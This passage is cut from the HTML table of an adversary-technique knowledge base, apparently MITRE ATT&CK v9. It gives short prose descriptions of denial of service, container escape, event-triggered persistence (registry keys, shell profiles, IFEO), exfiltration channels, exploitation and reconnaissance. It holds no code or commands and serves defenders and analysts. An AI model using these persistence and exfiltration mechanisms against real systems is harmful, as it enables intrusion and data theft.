a system. These attacks do not need to exhaust the actual resources on a system since they can simply exhaust the limits that an OS self-imposes to prevent the entire system from being overwhelmed by excessive demands on its capacity. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1499/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1499/002"> Service Exhaustion Flood </a> </td> <td> Adversaries may target the different network services provided by systems to conduct a DoS. Adversaries often target DNS and web services, however others have been targeted as well. Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1499/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1499/003"> Application Exhaustion Flood </a> </td> <td> Adversaries may target resource intensive features of web applications to cause a denial of service (DoS). Specific features in web applications may be highly resource intensive. Repeated requests to those features may be able to exhaust system resources and deny access to the application or the server itself. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1499/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1499/004"> Application or System Exploitation </a> </td> <td> Adversaries may exploit software vulnerabilities that can cause an application or system to crash and deny availability to users. Some systems may automatically restart critical applications and services when crashes occur, but they can likely be re-exploited to cause a persistent DoS condition. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1611"> T1611 </a> </td> <td> <a href="/versions/v9/techniques/T1611"> Escape to Host </a> </td> <td> Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1585"> T1585 </a> </td> <td> <a href="/versions/v9/techniques/T1585"> Establish Accounts </a> </td> <td> Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1585/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1585/001"> Social Media Accounts </a> </td> <td> Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1585/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1585/002"> Email Accounts </a> </td> <td> Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct <a href="/versions/v9/techniques/T1598">Phishing for Information</a> or <a href="/versions/v9/techniques/T1566">Phishing</a>. Adversaries may also take steps to cultivate a persona around the email account, such as through use of <a href="/versions/v9/techniques/T1585/001">Social Media Accounts</a>, to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: <a href="/versions/v9/techniques/T1583/001">Domains</a>). </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1546"> T1546 </a> </td> <td> <a href="/versions/v9/techniques/T1546"> Event Triggered Execution </a> </td> <td> Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1546/001"> Change Default File Association </a> </td> <td> Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1546/002"> Screensaver </a> </td> <td> Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension. The Windows screensaver application scrnsave.scr is located in <code>C:\Windows\System32\</code>, and <code>C:\Windows\sysWOW64\</code> on 64-bit Windows systems, along with screensavers included with base Windows installations. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1546/003"> Windows Management Instrumentation Event Subscription </a> </td> <td> Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1546/004"> Unix Shell Configuration Modification </a> </td> <td> Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User <a href="/versions/v9/techniques/T1059/004">Unix Shell</a>s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (<code>/etc</code>) and the user’s home directory (<code>~/</code>) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/005"> .005 </a> </td> <td> <a href="/versions/v9/techniques/T1546/005"> Trap </a> </td> <td> Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The <code>trap</code> command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like <code>ctrl+c</code> and <code>ctrl+d</code>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/006"> .006 </a> </td> <td> <a href="/versions/v9/techniques/T1546/006"> LC_LOAD_DYLIB Addition </a> </td> <td> Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. There are tools available to perform these changes. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/007"> .007 </a> </td> <td> <a href="/versions/v9/techniques/T1546/007"> Netsh Helper DLL </a> </td> <td> Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/008"> .008 </a> </td> <td> <a href="/versions/v9/techniques/T1546/008"> Accessibility Features </a> </td> <td> Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/009"> .009 </a> </td> <td> <a href="/versions/v9/techniques/T1546/009"> AppCert DLLs </a> </td> <td> Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppCertDLLs</code> Registry key under <code>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\</code> are loaded into every process that calls the ubiquitously used application programming interface (API) functions <code>CreateProcess</code>, <code>CreateProcessAsUser</code>, <code>CreateProcessWithLoginW</code>, <code>CreateProcessWithTokenW</code>, or <code>WinExec</code>. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/010"> .010 </a> </td> <td> <a href="/versions/v9/techniques/T1546/010"> AppInit DLLs </a> </td> <td> Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the <code>AppInit_DLLs</code> value in the Registry keys <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> or <code>HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows</code> are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/011"> .011 </a> </td> <td> <a href="/versions/v9/techniques/T1546/011"> Application Shimming </a> </td> <td> Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/012"> .012 </a> </td> <td> <a href="/versions/v9/techniques/T1546/012"> Image File Execution Options Injection </a> </td> <td> Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., <code>C:\dbg\ntsd.exe -g notepad.exe</code>). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/013"> .013 </a> </td> <td> <a href="/versions/v9/techniques/T1546/013"> PowerShell Profile </a> </td> <td> Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (<code>profile.ps1</code>) is a script that runs when <a href="/versions/v9/techniques/T1059/001">PowerShell</a> starts and can be used as a logon script to customize user environments. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/014"> .014 </a> </td> <td> <a href="/versions/v9/techniques/T1546/014"> Emond </a> </td> <td> Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a <a href="/versions/v9/techniques/T1543/004">Launch Daemon</a> that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at <code>/sbin/emond</code> will load any rules from the <code>/etc/emond.d/rules/</code> directory and take action once an explicitly defined event takes place. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1546/015"> .015 </a> </td> <td> <a href="/versions/v9/techniques/T1546/015"> Component Object Model Hijacking </a> </td> <td> Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system. References to various COM objects are stored in the Registry. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1480"> T1480 </a> </td> <td> <a href="/versions/v9/techniques/T1480"> Execution Guardrails </a> </td> <td> Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign. Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1480/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1480/001"> Environmental Keying </a> </td> <td> Adversaries may environmentally key payloads or other features of malware to evade defenses and constraint execution to a specific target environment. Environmental keying uses cryptography to constrain execution or actions based on adversary supplied environment specific conditions that are expected to be present on the target. Environmental keying is an implementation of <a href="/versions/v9/techniques/T1480">Execution Guardrails</a> that utilizes cryptographic techniques for deriving encryption/decryption keys from specific types of values in a given computing environment. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1048"> T1048 </a> </td> <td> <a href="/versions/v9/techniques/T1048"> Exfiltration Over Alternative Protocol </a> </td> <td> Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1048/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1048/001"> Exfiltration Over Symmetric Encrypted Non-C2 Protocol </a> </td> <td> Adversaries may steal data by exfiltrating it over a symmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1048/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1048/002"> Exfiltration Over Asymmetric Encrypted Non-C2 Protocol </a> </td> <td> Adversaries may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1048/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1048/003"> Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol </a> </td> <td> Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1041"> T1041 </a> </td> <td> <a href="/versions/v9/techniques/T1041"> Exfiltration Over C2 Channel </a> </td> <td> Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1011"> T1011 </a> </td> <td> <a href="/versions/v9/techniques/T1011"> Exfiltration Over Other Network Medium </a> </td> <td> Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1011/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1011/001"> Exfiltration Over Bluetooth </a> </td> <td> Adversaries may attempt to exfiltrate data over Bluetooth rather than the command and control channel. If the command and control network is a wired Internet connection, an attacker may opt to exfiltrate data using a Bluetooth communication channel. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1052"> T1052 </a> </td> <td> <a href="/versions/v9/techniques/T1052"> Exfiltration Over Physical Medium </a> </td> <td> Adversaries may attempt to exfiltrate data via a physical medium, such as a removable drive. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a physical medium or device introduced by a user. Such media could be an external hard drive, USB drive, cellular phone, MP3 player, or other removable storage and processing device. The physical medium or device could be used as the final exfiltration point or to hop between otherwise disconnected systems. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1052/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1052/001"> Exfiltration over USB </a> </td> <td> Adversaries may attempt to exfiltrate data over a USB connected physical device. In certain circumstances, such as an air-gapped network compromise, exfiltration could occur via a USB device introduced by a user. The USB device could be used as the final exfiltration point or to hop between otherwise disconnected systems. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1567"> T1567 </a> </td> <td> <a href="/versions/v9/techniques/T1567"> Exfiltration Over Web Service </a> </td> <td> Adversaries may use an existing, legitimate external Web service to exfiltrate data rather than their primary command and control channel. Popular Web services acting as an exfiltration mechanism may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to compromise. Firewall rules may also already exist to permit traffic to these services. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1567/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1567/001"> Exfiltration to Code Repository </a> </td> <td> Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1567/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1567/002"> Exfiltration to Cloud Storage </a> </td> <td> Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1190"> T1190 </a> </td> <td> <a href="/versions/v9/techniques/T1190"> Exploit Public-Facing Application </a> </td> <td> Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other applications with Internet accessible open sockets, such as web servers and related services. Depending on the flaw being exploited this may include <a href="/versions/v9/techniques/T1211">Exploitation for Defense Evasion</a>. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1203"> T1203 </a> </td> <td> <a href="/versions/v9/techniques/T1203"> Exploitation for Client Execution </a> </td> <td> Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1212"> T1212 </a> </td> <td> <a href="/versions/v9/techniques/T1212"> Exploitation for Credential Access </a> </td> <td> Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Credentialing and authentication mechanisms may be targeted for exploitation by adversaries as a means to gain access to useful credentials or circumvent the process to gain access to systems. One example of this is MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain user permissions. Exploitation for credential access may also result in Privilege Escalation depending on the process targeted or credentials obtained. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1211"> T1211 </a> </td> <td> <a href="/versions/v9/techniques/T1211"> Exploitation for Defense Evasion </a> </td> <td> Adversaries may exploit a system or application vulnerability to bypass security features. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Vulnerabilities may exist in defensive security software that can be used to disable or circumvent them. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1068"> T1068 </a> </td> <td> <a href="/versions/v9/techniques/T1068"> Exploitation for Privilege Escalation </a> </td> <td> Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1210"> T1210 </a> </td> <td> <a href="/versions/v9/techniques/T1210"> Exploitation of Remote Services </a> </td> <td> Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1133"> T1133 </a> </td> <td> <a href="/versions/v9/techniques/T1133"> External Remote Services </a> </td> <td> Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as <a href="/versions/v9/techniques/T1021/006">Windows Remote Management</a> can also be used externally. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1008"> T1008 </a> </td> <td> <a href="/versions/v9/techniques/T1008"> Fallback Channels </a> </td> <td> Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1083"> T1083 </a> </td> <td> <a href="/versions/v9/techniques/T1083"> File and Directory Discovery </a> </td> <td> Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from <a href="/versions/v9/techniques/T1083">File and Directory Discovery</a> during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1222"> T1222 </a> </td> <td> <a href="/versions/v9/techniques/T1222"> File and Directory Permissions Modification </a> </td> <td> Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files. File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1222/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1222/001"> Windows File and Directory Permissions Modification </a> </td> <td> Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files. File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1222/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1222/002"> Linux and Mac File and Directory Permissions Modification </a> </td> <td> Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files. File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.). </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1495"> T1495 </a> </td> <td> <a href="/versions/v9/techniques/T1495"> Firmware Corruption </a> </td> <td> Adversaries may overwrite or corrupt the flash memory contents of system BIOS or other firmware in devices attached to a system in order to render them inoperable or unable to boot. Firmware is software that is loaded and executed from non-volatile memory on hardware devices in order to initialize and manage device functionality. These devices could include the motherboard, hard drive, or video cards. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1187"> T1187 </a> </td> <td> <a href="/versions/v9/techniques/T1187"> Forced Authentication </a> </td> <td> Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1606"> T1606 </a> </td> <td> <a href="/versions/v9/techniques/T1606"> Forge Web Credentials </a> </td> <td> Adversaries may forge credential materials that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies, tokens, or other materials to authenticate and authorize user access. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1606/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1606/001"> Web Cookies </a> </td> <td> Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1606/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1606/002"> SAML Tokens </a> </td> <td> An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate. The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions ...</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>. Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1592"> T1592 </a> </td> <td> <a href="/versions/v9/techniques/T1592"> Gather Victim Host Information </a> </td> <td> Adversaries may gather information about the victim's hosts that can be used during targeting. Information about hosts may include a variety of details, including administrative data (ex: name, assigned IP, functionality, etc.) as well as specifics regarding its configuration (ex: operating system, language, etc.). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1592/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1592/001"> Hardware </a> </td> <td> Adversaries may gather information about the victim's host hardware that can be used during targeting. Information about hardware infrastructure may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: card/biometric readers, dedicated encryption hardware, etc.). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1592/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1592/002"> Software </a> </td> <td> Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1592/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1592/003"> Firmware </a> </td> <td> Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.). </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1592/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1592/004"> Client Configurations </a> </td> <td> Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1589"> T1589 </a> </td> <td> <a href="/versions/v9/techniques/T1589"> Gather Victim Identity Information </a> </td> <td> Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1589/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1589/001"> Credentials </a> </td> <td> Adversaries may gather credentials that can be used during targeting. Account credentials gathered by adversaries may be those directly associated with the target victim organization or attempt to take advantage of the tendency for users to use the same passwords across personal and business accounts. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1589/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1589/002"> Email Addresses </a> </td> <td> Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1589/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1589/003"> Employee Names </a> </td> <td> Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures. </td> </tr> <tr class="technique"> <td colspan="2"> <a href="/versions/v9/techniques/T1590"> T1590 </a> </td> <td> <a href="/versions/v9/techniques/T1590"> Gather Victim Network Information </a> </td> <td> Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1590/001"> .001 </a> </td> <td> <a href="/versions/v9/techniques/T1590/001"> Domain Properties </a> </td> <td> Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1590/002"> .002 </a> </td> <td> <a href="/versions/v9/techniques/T1590/002"> DNS </a> </td> <td> Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1590/003"> .003 </a> </td> <td> <a href="/versions/v9/techniques/T1590/003"> Network Trust Dependencies </a> </td> <td> Adversaries may gather information about the victim's network trust dependencies that can be used during targeting. Information about network trusts may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1590/004"> .004 </a> </td> <td> <a href="/versions/v9/techniques/T1590/004"> Network Topology </a> </td> <td> Adversaries may gather information about the victim's network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure. </td> </tr> <tr class="sub technique"> <td></td> <td> <a href="/versions/v9/techniques/T1590/005"> .005 </a> </td> <td> <a 